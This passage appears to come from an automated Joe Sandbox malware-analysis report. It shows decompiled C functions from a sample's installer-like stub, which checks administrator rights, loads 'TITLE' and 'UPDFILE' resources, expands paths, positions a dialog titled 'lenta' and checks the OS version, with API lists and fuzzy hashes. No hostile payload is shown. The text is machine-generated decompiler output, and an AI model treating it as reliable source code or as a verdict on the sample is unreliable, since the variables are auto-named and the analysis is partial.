                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                              • String ID: lenta
                              • API String ID: 3785188418-2780258678
                              • Opcode ID: 48aa877716716c5f64d2deaa3dabff397c144ea1f270a437f86d55603e6ab855
                              • Instruction ID: 6b51e0b9cca7e3f451eb5762dd6d914920633900c662f0fffc523d224311263f
                              • Opcode Fuzzy Hash: 48aa877716716c5f64d2deaa3dabff397c144ea1f270a437f86d55603e6ab855
                              • Instruction Fuzzy Hash: 2011AF32244211BBEF119BA49C0CB9E3B64FB9A721F91C720F81D951E1DB748682E782
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 91%
                              			E00A718A3(void* __edx, void* __esi) {
                              				signed int _v8;
                              				short _v12;
                              				struct _SID_IDENTIFIER_AUTHORITY _v16;
                              				char _v20;
                              				long _v24;
                              				void* _v28;
                              				void* _v32;
                              				void* __ebx;
                              				void* __edi;
                              				signed int _t23;
                              				long _t45;
                              				void* _t49;
                              				int _t50;
                              				void* _t52;
                              				signed int _t53;
                              
                              				_t51 = __esi;
                              				_t49 = __edx;
                              				_t23 =  *0xa78004; // 0x74742267
                              				_v8 = _t23 ^ _t53;
                              				_t25 =  *0xa78128; // 0x2
                              				_t45 = 0;
                              				_v12 = 0x500;
                              				_t50 = 2;
                              				_v16.Value = 0;
                              				_v20 = 0;
                              				if(_t25 != _t50) {
                              					L20:
                              					return E00A76CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                              				}
                              				if(E00A717EE( &_v20) != 0) {
                              					_t25 = _v20;
                              					if(_v20 != 0) {
                              						 *0xa78128 = 1;
                              					}
                              					goto L20;
                              				}
                              				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                              					goto L20;
                              				}
                              				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                              					L17:
                              					CloseHandle(_v28);
                              					_t25 = _v20;
                              					goto L20;
                              				} else {
                              					_push(__esi);
                              					_t52 = LocalAlloc(0, _v24);
                              					if(_t52 == 0) {
                              						L16:
                              						_pop(_t51);
                              						goto L17;
                              					}
                              					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                              						L15:
                              						LocalFree(_t52);
                              						goto L16;
                              					} else {
                              						if( *_t52 <= 0) {
                              							L14:
                              							FreeSid(_v32);
                              							goto L15;
                              						}
                              						_t15 = _t52 + 4; // 0x4
                              						_t50 = _t15;
                              						while(EqualSid( *_t50, _v32) == 0) {
                              							_t45 = _t45 + 1;
                              							_t50 = _t50 + 8;
                              							if(_t45 <  *_t52) {
                              								continue;
                              							}
                              							goto L14;
                              						}
                              						 *0xa78128 = 1;
                              						_v20 = 1;
                              						goto L14;
                              					}
                              				}
                              			}

                              APIs
                                • Part of subcall function 00A717EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A718DD), ref: 00A7181A
                                • Part of subcall function 00A717EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A7182C
                                • Part of subcall function 00A717EE: AllocateAndInitializeSid.ADVAPI32(00A718DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A718DD), ref: 00A71855
                                • Part of subcall function 00A717EE: FreeSid.ADVAPI32(?,?,?,?,00A718DD), ref: 00A71883
                                • Part of subcall function 00A717EE: FreeLibrary.KERNEL32(00000000,?,?,?,00A718DD), ref: 00A7188A
                              • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00A718EB
                              • OpenProcessToken.ADVAPI32(00000000), ref: 00A718F2
                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00A7190A
                              • GetLastError.KERNEL32 ref: 00A71918
                              • LocalAlloc.KERNEL32(00000000,?,?), ref: 00A7192C
                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00A71944
                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A71964
                              • EqualSid.ADVAPI32(00000004,?), ref: 00A7197A
                              • FreeSid.ADVAPI32(?), ref: 00A7199C
                              • LocalFree.KERNEL32(00000000), ref: 00A719A3
                              • CloseHandle.KERNEL32(?), ref: 00A719AD
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                              • String ID:
                              • API String ID: 2168512254-0
                              • Opcode ID: f9c2b685375ed3d163e6b3cf2014ff11dd35e5a7f0c5047233bebb78bbda4c9f
                              • Instruction ID: 04ba124c64cbe6b465839ca94805d563cf538a91ad1486e95cb1b66bf170c6f4
                              • Opcode Fuzzy Hash: f9c2b685375ed3d163e6b3cf2014ff11dd35e5a7f0c5047233bebb78bbda4c9f
                              • Instruction Fuzzy Hash: 63311B71A00209ABDB20DFE9DC58AAFBBFCFB54701F10C829E649E2150E7349947CB65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 82%
                              			E00A7468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                              				long _t4;
                              				void* _t11;
                              				CHAR* _t14;
                              				void* _t15;
                              				long _t16;
                              
                              				_t14 = __ecx;
                              				_t11 = __edx;
                              				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                              				_t16 = _t4;
                              				if(_t16 <= _a4 && _t11 != 0) {
                              					if(_t16 == 0) {
                              						L5:
                              						return 0;
                              					}
                              					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                              					if(_t15 == 0) {
                              						goto L5;
                              					}
                              					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                              					FreeResource(_t15);
                              					return _t16;
                              				}
                              				return _t4;
                              			}

                              APIs
                              • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746A0
                              • SizeofResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746A9
                              • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746C3
                              • LoadResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746CC
                              • LockResource.KERNEL32(00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746D3
                              • memcpy_s.MSVCRT ref: 00A746E5
                              • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                              • String ID: TITLE$lenta
                              • API String ID: 3370778649-2035842925
                              • Opcode ID: 5947f082518b7b0ee07d468af74b59a5ad0bc13a5227856d13745dd182d016ae
                              • Instruction ID: e96d4993ce87199eb11c1323a9f619721ebf327fb19b1c7d00199a5ff5892227
                              • Opcode Fuzzy Hash: 5947f082518b7b0ee07d468af74b59a5ad0bc13a5227856d13745dd182d016ae
                              • Instruction Fuzzy Hash: 6C0186362442107BE31067E56C4DF6F7E2CEBDAB52F04C414FA4D96191DA61888287A6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 57%
                              			E00A717EE(intOrPtr* __ecx) {
                              				signed int _v8;
                              				short _v12;
                              				struct _SID_IDENTIFIER_AUTHORITY _v16;
                              				_Unknown_base(*)()* _v20;
                              				void* _v24;
                              				intOrPtr* _v28;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t14;
                              				_Unknown_base(*)()* _t20;
                              				long _t28;
                              				void* _t35;
                              				struct HINSTANCE__* _t36;
                              				signed int _t38;
                              				intOrPtr* _t39;
                              
                              				_t14 =  *0xa78004; // 0x74742267
                              				_v8 = _t14 ^ _t38;
                              				_v12 = 0x500;
                              				_t37 = __ecx;
                              				_v16.Value = 0;
                              				_v28 = __ecx;
                              				_t28 = 0;
                              				_t36 = LoadLibraryA("advapi32.dll");
                              				if(_t36 != 0) {
                              					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                              					_v20 = _t20;
                              					if(_t20 != 0) {
                              						 *_t37 = 0;
                              						_t28 = 1;
                              						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                              							_t37 = _t39;
                              							 *0xa7a288(0, _v24, _v28);
                              							_v20();
                              							if(_t39 != _t39) {
                              								asm("int 0x29");
                              							}
                              							FreeSid(_v24);
                              						}
                              					}
                              					FreeLibrary(_t36);
                              				}
                              				return E00A76CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                              			}




















                              APIs
                              • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A718DD), ref: 00A7181A
                              • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A7182C
                              • AllocateAndInitializeSid.ADVAPI32(00A718DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A718DD), ref: 00A71855
                              • FreeSid.ADVAPI32(?,?,?,?,00A718DD), ref: 00A71883
                              • FreeLibrary.KERNEL32(00000000,?,?,?,00A718DD), ref: 00A7188A
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                              • String ID: CheckTokenMembership$advapi32.dll
                              • API String ID: 4204503880-1888249752
                              • Opcode ID: e5527b148367d20f9999d75380589b3211050909ebdb7b1702ce6d55341a1bc6
                              • Instruction ID: f65898f1fedbbada9ef169f74b1a57620fe3276da7b4513a0350f86002db7699
                              • Opcode Fuzzy Hash: e5527b148367d20f9999d75380589b3211050909ebdb7b1702ce6d55341a1bc6
                              • Instruction Fuzzy Hash: 99116A71F00205BBDB10DFE4DC49ABEB7B8FF44701F108569F919E6290DA709D468791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A73450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                              				void* _t7;
                              				void* _t11;
                              				struct HWND__* _t12;
                              				int _t22;
                              				struct HWND__* _t24;
                              
                              				_t7 = _a8 - 0x10;
                              				if(_t7 == 0) {
                              					EndDialog(_a4, 2);
                              					L11:
                              					return 1;
                              				}
                              				_t11 = _t7 - 0x100;
                              				if(_t11 == 0) {
                              					_t12 = GetDesktopWindow();
                              					_t24 = _a4;
                              					E00A743D0(_t24, _t12);
                              					SetWindowTextA(_t24, "lenta");
                              					SetDlgItemTextA(_t24, 0x838,  *0xa79404);
                              					SetForegroundWindow(_t24);
                              					goto L11;
                              				}
                              				if(_t11 == 1) {
                              					_t22 = _a12;
                              					if(_t22 < 6) {
                              						goto L11;
                              					}
                              					if(_t22 <= 7) {
                              						L8:
                              						EndDialog(_a4, _t22);
                              						return 1;
                              					}
                              					if(_t22 != 0x839) {
                              						goto L11;
                              					}
                              					 *0xa791dc = 1;
                              					goto L8;
                              				}
                              				return 0;
                              			}









                              APIs
                              • EndDialog.USER32(?,?), ref: 00A73490
                              • GetDesktopWindow.USER32 ref: 00A7349A
                              • SetWindowTextA.USER32(?,lenta), ref: 00A734B2
                              • SetDlgItemTextA.USER32(?,00000838), ref: 00A734C4
                              • SetForegroundWindow.USER32(?), ref: 00A734CB
                              • EndDialog.USER32(?,00000002), ref: 00A734D8
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Window$DialogText$DesktopForegroundItem
                              • String ID: lenta
                              • API String ID: 852535152-2780258678
                              • Opcode ID: 65c71bc73fe9b4634a1fc88e38e777b7396ab6de52202818fc9bbe16cec76a26
                              • Instruction ID: 9528f6f1dc72f00c18de99c067ae0e1f0c2344ce70be86f39c8f06305d9a3538
                              • Opcode Fuzzy Hash: 65c71bc73fe9b4634a1fc88e38e777b7396ab6de52202818fc9bbe16cec76a26
                              • Instruction Fuzzy Hash: 8501B533250114BBDB1E9FA5DC0C96E3B64EB45702F51C121FA4E865A0C7718F92EB85
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 95%
                              			E00A72AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                              				signed int _v8;
                              				char _v268;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t16;
                              				int _t21;
                              				char _t32;
                              				intOrPtr _t34;
                              				char* _t38;
                              				char _t42;
                              				char* _t44;
                              				CHAR* _t52;
                              				intOrPtr* _t55;
                              				CHAR* _t59;
                              				void* _t62;
                              				CHAR* _t64;
                              				CHAR* _t65;
                              				signed int _t66;
                              
                              				_t60 = __edx;
                              				_t16 =  *0xa78004; // 0x74742267
                              				_t17 = _t16 ^ _t66;
                              				_v8 = _t16 ^ _t66;
                              				_t65 = _a4;
                              				_t44 = __edx;
                              				_t64 = __ecx;
                              				if( *((char*)(__ecx)) != 0) {
                              					GetModuleFileNameA( *0xa79a3c,  &_v268, 0x104);
                              					while(1) {
                              						_t17 =  *_t64;
                              						if(_t17 == 0) {
                              							break;
                              						}
                              						_t21 = IsDBCSLeadByte(_t17);
                              						 *_t65 =  *_t64;
                              						if(_t21 != 0) {
                              							_t65[1] = _t64[1];
                              						}
                              						if( *_t64 != 0x23) {
                              							L19:
                              							_t65 = CharNextA(_t65);
                              						} else {
                              							_t64 = CharNextA(_t64);
                              							if(CharUpperA( *_t64) != 0x44) {
                              								if(CharUpperA( *_t64) != 0x45) {
                              									if( *_t64 == 0x23) {
                              										goto L19;
                              									}
                              								} else {
                              									E00A71680(_t65, E00A717C8(_t44, _t65),  &_v268);
                              									_t52 = _t65;
                              									_t14 =  &(_t52[1]); // 0x2
                              									_t60 = _t14;
                              									do {
                              										_t32 =  *_t52;
                              										_t52 =  &(_t52[1]);
                              									} while (_t32 != 0);
                              									goto L17;
                              								}
                              							} else {
                              								E00A765E8( &_v268);
                              								_t55 =  &_v268;
                              								_t62 = _t55 + 1;
                              								do {
                              									_t34 =  *_t55;
                              									_t55 = _t55 + 1;
                              								} while (_t34 != 0);
                              								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                              								if(_t38 != 0 &&  *_t38 == 0x5c) {
                              									 *_t38 = 0;
                              								}
                              								E00A71680(_t65, E00A717C8(_t44, _t65),  &_v268);
                              								_t59 = _t65;
                              								_t12 =  &(_t59[1]); // 0x2
                              								_t60 = _t12;
                              								do {
                              									_t42 =  *_t59;
                              									_t59 =  &(_t59[1]);
                              								} while (_t42 != 0);
                              								L17:
                              								_t65 =  &(_t65[_t52 - _t60]);
                              							}
                              						}
                              						_t64 = CharNextA(_t64);
                              					}
                              					 *_t65 = _t17;
                              				}
                              				return E00A76CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                              			}























                              APIs
                              • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00A72AE6
                              • IsDBCSLeadByte.KERNEL32(00000000), ref: 00A72AF2
                              • CharNextA.USER32(?), ref: 00A72B12
                              • CharUpperA.USER32 ref: 00A72B1E
                              • CharPrevA.USER32(?,?), ref: 00A72B55
                              • CharNextA.USER32(?), ref: 00A72BD4
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                              • String ID:
                              • API String ID: 571164536-0
                              • Opcode ID: 3574363019855b714b3ae9130582135810cd5af1ab4de0e5af0ea9d6c4cae943
                              • Instruction ID: 9c810bf8a4634cdb2d9daf5aec2f2c95906a66c213afa1468d166c732d521c6f
                              • Opcode Fuzzy Hash: 3574363019855b714b3ae9130582135810cd5af1ab4de0e5af0ea9d6c4cae943
                              • Instruction Fuzzy Hash: BA4105356082856EDB159F348C54BFD7BA99FD6300F14C19AE8CA87202DB358E87CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E00A743D0(struct HWND__* __ecx, struct HWND__* __edx) {
                              				signed int _v8;
                              				struct tagRECT _v24;
                              				struct tagRECT _v40;
                              				struct HWND__* _v44;
                              				intOrPtr _v48;
                              				int _v52;
                              				intOrPtr _v56;
                              				int _v60;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t29;
                              				void* _t53;
                              				intOrPtr _t56;
                              				int _t59;
                              				struct HWND__* _t63;
                              				struct HWND__* _t67;
                              				struct HWND__* _t68;
                              				struct HDC__* _t69;
                              				int _t72;
                              				signed int _t74;
                              
                              				_t63 = __edx;
                              				_t29 =  *0xa78004; // 0x74742267
                              				_v8 = _t29 ^ _t74;
                              				_t68 = __edx;
                              				_v44 = __ecx;
                              				GetWindowRect(__ecx,  &_v40);
                              				_t53 = _v40.bottom - _v40.top;
                              				_v48 = _v40.right - _v40.left;
                              				GetWindowRect(_t68,  &_v24);
                              				_v56 = _v24.bottom - _v24.top;
                              				_t69 = GetDC(_v44);
                              				_v52 = GetDeviceCaps(_t69, 8);
                              				_v60 = GetDeviceCaps(_t69, 0xa);
                              				ReleaseDC(_v44, _t69);
                              				_t56 = _v48;
                              				asm("cdq");
                              				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                              				_t67 = 0;
                              				if(_t72 >= 0) {
                              					_t63 = _v52;
                              					if(_t72 + _t56 > _t63) {
                              						_t72 = _t63 - _t56;
                              					}
                              				} else {
                              					_t72 = _t67;
                              				}
                              				asm("cdq");
                              				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                              				if(_t59 >= 0) {
                              					_t63 = _v60;
                              					if(_t59 + _t53 > _t63) {
                              						_t59 = _t63 - _t53;
                              					}
                              				} else {
                              					_t59 = _t67;
                              				}
                              				return E00A76CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                              			}

























                              APIs
                              • GetWindowRect.USER32(?,?), ref: 00A743F1
                              • GetWindowRect.USER32(00000000,?), ref: 00A7440B
                              • GetDC.USER32(?), ref: 00A74423
                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00A7442E
                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00A7443A
                              • ReleaseDC.USER32(?,00000000), ref: 00A74447
                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00A744A2
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Window$CapsDeviceRect$Release
                              • String ID:
                              • API String ID: 2212493051-0
                              • Opcode ID: 43184ea3db8d29c4263131e39b9f0a60c52f883feb8b27b9cdc70140604e5554
                              • Instruction ID: ef3c8423c99aaac0a73db749d7b0bda914af3b299068fe62144dd6d9aad8a398
                              • Opcode Fuzzy Hash: 43184ea3db8d29c4263131e39b9f0a60c52f883feb8b27b9cdc70140604e5554
                              • Instruction Fuzzy Hash: CD312F72E00119AFDB14CFF8DD499EEBBB5EB89311F558269F809B3250DA306D468B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 53%
                              			E00A76298(intOrPtr __ecx, intOrPtr* __edx) {
                              				signed int _v8;
                              				char _v28;
                              				intOrPtr _v32;
                              				struct HINSTANCE__* _v36;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t16;
                              				struct HRSRC__* _t21;
                              				intOrPtr _t26;
                              				void* _t30;
                              				struct HINSTANCE__* _t36;
                              				intOrPtr* _t40;
                              				void* _t41;
                              				intOrPtr* _t44;
                              				intOrPtr* _t45;
                              				void* _t47;
                              				signed int _t50;
                              				struct HINSTANCE__* _t51;
                              
                              				_t44 = __edx;
                              				_t16 =  *0xa78004; // 0x74742267
                              				_v8 = _t16 ^ _t50;
                              				_t46 = 0;
                              				_v32 = __ecx;
                              				_v36 = 0;
                              				_t36 = 1;
                              				E00A7171E( &_v28, 0x14, "UPDFILE%lu", 0);
                              				while(1) {
                              					_t51 = _t51 + 0x10;
                              					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                              					if(_t21 == 0) {
                              						break;
                              					}
                              					_t45 = LockResource(LoadResource(_t46, _t21));
                              					if(_t45 == 0) {
                              						 *0xa79124 = 0x80070714;
                              						_t36 = _t46;
                              					} else {
                              						_t5 = _t45 + 8; // 0x8
                              						_t44 = _t5;
                              						_t40 = _t44;
                              						_t6 = _t40 + 1; // 0x9
                              						_t47 = _t6;
                              						do {
                              							_t26 =  *_t40;
                              							_t40 = _t40 + 1;
                              						} while (_t26 != 0);
                              						_t41 = _t40 - _t47;
                              						_t46 = _t51;
                              						_t7 = _t41 + 1; // 0xa
                              						 *0xa7a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                              						_t30 = _v32();
                              						if(_t51 != _t51) {
                              							asm("int 0x29");
                              						}
                              						_push(_t45);
                              						if(_t30 == 0) {
                              							_t36 = 0;
                              							FreeResource(??);
                              						} else {
                              							FreeResource();
                              							_v36 = _v36 + 1;
                              							E00A7171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                              							_t46 = 0;
                              							continue;
                              						}
                              					}
                              					L12:
                              					return E00A76CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                              				}
                              				goto L12;
                              			}























                              APIs
                                • Part of subcall function 00A7171E: _vsnprintf.MSVCRT ref: 00A71750
                              • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00A751CA,00000004,00000024,00A72F71,?,00000002,00000000), ref: 00A762CD
                              • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A751CA,00000004,00000024,00A72F71,?,00000002,00000000), ref: 00A762D4
                              • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A751CA,00000004,00000024,00A72F71,?,00000002,00000000), ref: 00A7631B
                              • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00A76345
                              • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A751CA,00000004,00000024,00A72F71,?,00000002,00000000), ref: 00A76357
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Resource$Free$FindLoadLock_vsnprintf
                              • String ID: UPDFILE%lu
                              • API String ID: 2922116661-2329316264
                              • Opcode ID: c3df47f0bbe8585ae3e64cc35521c562745db6d00ddae189260c85af513ca490
                              • Instruction ID: d7da4928d12a9fec4ea62991474e2dbe7b45cf7fe92f4d931f30a56dafeba5c0
                              • Opcode Fuzzy Hash: c3df47f0bbe8585ae3e64cc35521c562745db6d00ddae189260c85af513ca490
                              • Instruction Fuzzy Hash: 2021E471A00619ABDB14DFA49C49AFE7B78FB84710B00C229F90AA7241DB359D42CBE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E00A7681F(void* __ebx) {
                              				signed int _v8;
                              				char _v20;
                              				struct _OSVERSIONINFOA _v168;
                              				void* _v172;
                              				int* _v176;
                              				int _v180;
                              				int _v184;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t19;
                              				long _t31;
                              				signed int _t35;
                              				void* _t36;
                              				intOrPtr _t41;
                              				signed int _t44;
                              
                              				_t36 = __ebx;
                              				_t19 =  *0xa78004; // 0x74742267
                              				_v8 = _t19 ^ _t44;
                              				_t41 =  *0xa781d8; // 0xfffffffe
                              				_t43 = 0;
                              				_v180 = 0xc;
                              				_v176 = 0;
                              				if(_t41 == 0xfffffffe) {
                              					 *0xa781d8 = 0;
                              					_v168.dwOSVersionInfoSize = 0x94;
                              					if(GetVersionExA( &_v168) == 0) {
                              						L12:
                              						_t41 =  *0xa781d8; // 0xfffffffe
                              					} else {
                              						_t41 = 1;
                              						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                              							goto L12;
                              						} else {
                              							_t31 = RegQueryValueExA(_v172, 0xa71140, 0,  &_v184,  &_v20,  &_v180);
                              							_t43 = _t31;
                              							RegCloseKey(_v172);
                              							if(_t31 != 0) {
                              								goto L12;
                              							} else {
                              								_t40 =  &_v176;
                              								if(E00A766F9( &_v20,  &_v176) == 0) {
                              									goto L12;
                              								} else {
                              									_t35 = _v176 & 0x000003ff;
                              									if(_t35 == 1 || _t35 == 0xd) {
                              										 *0xa781d8 = _t41;
                              									} else {
                              										goto L12;
                              									}
                              								}
                              							}
                              						}
                              					}
                              				}
                              				return E00A76CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                              			}



















                              APIs
                              • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A7686E
                              • GetSystemMetrics.USER32(0000004A), ref: 00A768A7
                              • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A768CC
